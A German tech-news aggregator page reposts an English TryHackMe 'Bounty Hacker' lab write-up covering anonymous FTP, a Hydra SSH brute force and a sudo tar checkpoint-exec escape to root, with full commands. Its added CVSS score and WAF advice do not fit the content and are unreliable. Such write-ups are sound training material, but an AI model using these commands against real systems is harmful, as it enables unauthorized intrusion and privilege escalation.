🔧 AI Nachrichten KI-Angriffe: Geheimdienste sollen neue Befugnisse erhalten(11.09.2026 um 11:00 Uhr)
🔧 AI Nachrichten Podcast: ChatGPT schwatzt Nutzern in Deutschland jetzt Werbung auf(28.08.2026 um 08:46 Uhr)
🐧 Linux TippsPACMAN: KI-Framework steuert Fusionsplasma in Echtzeit(11.09.2026 um 10:46 Uhr)
📰 IT NachrichtenAutismus und ADHS mit früher Weichmacher-Exposition verknüpft(12.09.2026 um 09:04 Uhr)
🪟 Windows TippsMicrosoft bringt Emoji 17.0 auf Windows 11(31.08.2026 um 08:16 Uhr)
⚠️ Malware / Trojaner / VirenNeue Android-Malware schreit Sie an, wenn Sie nicht zahlen(11.09.2026 um 10:33 Uhr)
📰 IT Nachrichten7-max: Tool bringt 10 bis 20 Prozent mehr Tempo für Programme(12.09.2026 um 09:30 Uhr)
⚠️ Malware / Trojaner / VirenHandy: Wer diese App installiert hat, sollte sein Gerät besser zurücksetzen(11.09.2026 um 16:55 Uhr)
🔧 AI Nachrichten KI-Angriffe: Geheimdienste sollen neue Befugnisse erhalten(11.09.2026 um 11:00 Uhr)
🔧 AI Nachrichten Podcast: ChatGPT schwatzt Nutzern in Deutschland jetzt Werbung auf(28.08.2026 um 08:46 Uhr)
🐧 Linux TippsPACMAN: KI-Framework steuert Fusionsplasma in Echtzeit(11.09.2026 um 10:46 Uhr)
📰 IT NachrichtenAutismus und ADHS mit früher Weichmacher-Exposition verknüpft(12.09.2026 um 09:04 Uhr)
🪟 Windows TippsMicrosoft bringt Emoji 17.0 auf Windows 11(31.08.2026 um 08:16 Uhr)
⚠️ Malware / Trojaner / VirenNeue Android-Malware schreit Sie an, wenn Sie nicht zahlen(11.09.2026 um 10:33 Uhr)
📰 IT Nachrichten7-max: Tool bringt 10 bis 20 Prozent mehr Tempo für Programme(12.09.2026 um 09:30 Uhr)
⚠️ Malware / Trojaner / VirenHandy: Wer diese App installiert hat, sollte sein Gerät besser zurücksetzen(11.09.2026 um 16:55 Uhr)

🕵️ Hacking 🕛 vor 2 Monaten 3 Min Lesezeit CVE-RADAR
0

TryHackMe — Bounty Hacker: The FTP Server Was Talking. I Just Listened.

Vulnerability & Security Bulletin Dossier CVSS 8.2 HIGH (Heuristik) EPSS 27.7%
CVE-SAMMELMELDUNG
ANGRIPPSVEKTOR
💻 Lokal
AUTHENTIFIZIERUNG
🔓 Keine Authentifizierung nötig
SCHADENSPROFIL
RCE / Vollzugriff / Full Compromise
CWE-KLASSIFIZIERUNG
CWE-269: Privilege Management
Handlungsempfehlung: ModSecurity WAF-Regeln aktivieren und HTTP/2-Konfiguration überprüfen.
Im CVE-Radar öffnen
↗ Quelle (infosecwriteups.com)
🔬 IoC Intelligence (1 Indikatoren erkannt)
10[.]0[.]0[.]5
🗣️ Stimme:
📑 Inhaltsübersicht

The web server was a dead end. The real story was sitting on port 21, waiting for anyone who didn’t need a password to find it.

You’ve been challenged to prove you’re the most elite hacker in the solar system.

The box doesn’t make it hard. It makes it honest. No CVEs, no rabbit holes, no bruteforce-for-hours nonsense. Just three ports, two text files, and a tar binary that GTFOBins knows very well.

The machine handed me everything. I just had to know where to look, and what to do when the first shell died immediately.

Let’s get into it.

Reconnaissance

nmap -sC -sV -oN bountyhacker.nmap 10.0.0.5
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp open ssh OpenSSH 8.2p1
80/tcp open http Apache 2.4.41

Three ports. My first instinct was port 80, there’s usually something there. Visited the page, checked source, ran a quick directory scan.

Nothing. A static page with Cowboy Bebop flavor text and zero attack surface.

The web server was bait. Port 21 is where the box actually starts.

FTP — Anonymous and Generous

ftp 10.0.0.5
# Name: anonymous
# Password: [blank]

No credentials needed. Anonymous login accepted immediately.

ls
locks.txt
task.txt

Two files. Downloaded both:

get locks.txt
get task.txt

task.txt opened first, a note signed by lin. Not a hint. A username, handed directly.

locks.txt opened second, a long list of strings that looked like lock combinations. Passwords. A ready-made wordlist sitting on an open FTP server, written by the same person whose name was just signed on the note above it.

The FTP server just gave me a username and a password list in the same breath.

Time to use them.

SSH Bruteforce — Hydra Does the Work

Port 22 is open. Username is lin. Password is somewhere inside locks.txt. The math is simple:

hydra -l lin -P locks.txt ssh://10.0.0.5 -t 4

Hydra chews through the list. One password matches:

[22][ssh] host: 10.0.0.5   login: lin   password: RedDr4gonSynd1cat3
ssh [email protected]
# RedDr4gonSynd1cat3

Shell as lin. user.txt is right there in the home directory.

One flag down. The FTP server gave me everything I needed to get here. I just had to pick it up.

Privilege Escalation — tar, GTFOBins, and a Shell That Didn’t Want to Stay

sudo -l
User lin may run the following commands:
(root) NOPASSWD: /usr/bin/tar

tar with sudo and no password. GTFOBins has this documented under shell escape, the checkpoint-exec technique abuses tar's --checkpoint-action flag to execute arbitrary commands mid-archive operation.

First attempt, straight from GTFOBins:

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Shell spawned. Then died immediately.

The /bin/sh process didn't survive in this environment. Not uncommon, some shells drop instantly depending on how the session is configured. The fix: tell it explicitly to stay alive and do something useful first.

sudo tar -cf /dev/null /root/root.txt --checkpoint=1 --checkpoint-action=exec="bash -c 'cat /root/root.txt; exec /bin/bash'"

This time: flag printed, bash stayed open, root shell confirmed.

whoami
root

The box didn’t expect anyone to refine the command. It expected copy-paste. I refined it.

Bounty Hacker is a room on TryHackMe. This writeup is for educational purposes only. All testing performed on dedicated lab infrastructure with explicit authorization.


on Medium, where people are continuing the conversation by highlighting and responding to this story.

Vollständiger Original-Bericht
Ausführliche Details, Code-Beispiele & Hersteller-Stellungnahme auf infosecwriteups.com.
↗ Original-Artikel auf infosecwriteups.com lesen
Wie bewertest du diesen Beitrag?
1 Klick Feedback
Teilen mit Netzwerk & Team:
Community Threat-Level Barometer
Live Votum

Wie stufst du das Risiko dieser Schwachstelle / Bedrohung für dein Unternehmen ein?

Noch keine Stimmen — schätze das Risiko als Erster ein.

Community-Analysen & Experten-Meinungen 0

Verfasse deine eigene Analyse, teile Workarounds oder diskutiere diesen Vorfall im Blog.
Noch keine Community-Analyse verfasst. Markiere einen Textabschnitt oder klicke oben auf Eigene Analyse verfassen“!
Community Pulse: Relevanz-Einschätzung
1 Klick Experten-Votum
🔴 Akute Relevanz 0%
🟡 In Evaluierung 0%
🟢 Keine Auswirkung 0%
Spannende Innovation 0%
Verwandte Story-Cluster & Quellen (Vektor-KI)
Port 8095 Engine
1 Quelle
KI-Angriffe: Geheimdienste sollen neue Befugnisse erhalten
1 Quelle
Podcast: ChatGPT schwatzt Nutzern in Deutschland jetzt Werbung auf
1 Quelle
PACMAN: KI-Framework steuert Fusionsplasma in Echtzeit
Ähnliche Beiträge
🔍 Verwandte News

Auch interessante Nachrichten TryHackMe — Bounty Hacker: The FTP Server Was Talking. I Just Listened.

Thematisch verwandte Begriffe: TryHackMe, Bounty, Hacker, Server · 6 Treffer

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...